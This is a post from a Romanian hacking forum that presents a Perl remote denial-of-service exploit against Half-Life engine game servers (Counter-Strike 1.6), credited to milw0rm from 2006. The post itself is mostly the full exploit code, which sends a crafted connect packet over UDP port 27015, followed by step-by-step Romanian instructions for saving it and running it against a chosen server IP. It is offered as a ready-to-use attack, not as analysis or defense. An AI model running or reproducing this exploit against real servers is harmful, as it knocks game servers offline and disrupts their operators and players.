hardhack
Cel mai tare forum de hackuri din romania
|
Nou pe simpatie: sarmaluta2002
 | Femeie 24 ani Bucuresti cauta Barbat 25 - 50 ani |
|
|
hardhackInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
|
| #1 |
s3byAdministrator
Postari: 243
|
|
Pasu 1:Perlu il loati de la Ttoriale Hacking LA Flood Pasu 2:
Code:
!/usr/bin/perl
# Server must not be running steam. /str0ke
// visit us at http://hardhack.3xforum.ro
# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];
if (fork())
{ econnect($host); }
else
{ econnect($host); };
exit;
sub econnect($)
{
my $host=$_[0];
my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";
sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$b);
$c2=$c[1];
$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}
# milw0rm.com [2006-02-11] |
3. Salvati intr-un fisier denumit nume.pl (sa aibe extensia .pl)
4. intri in start>RUN>CMD>cd C:/Perl/Bin perl x.pl [IP-UL SERVERULUI] (cu port ex: xx.xxx.xx.xxx:27015 si fara paranteze)
5. Astepta'ti 1-2 min. Inchide'ti fereastra. 
|
|
| |
|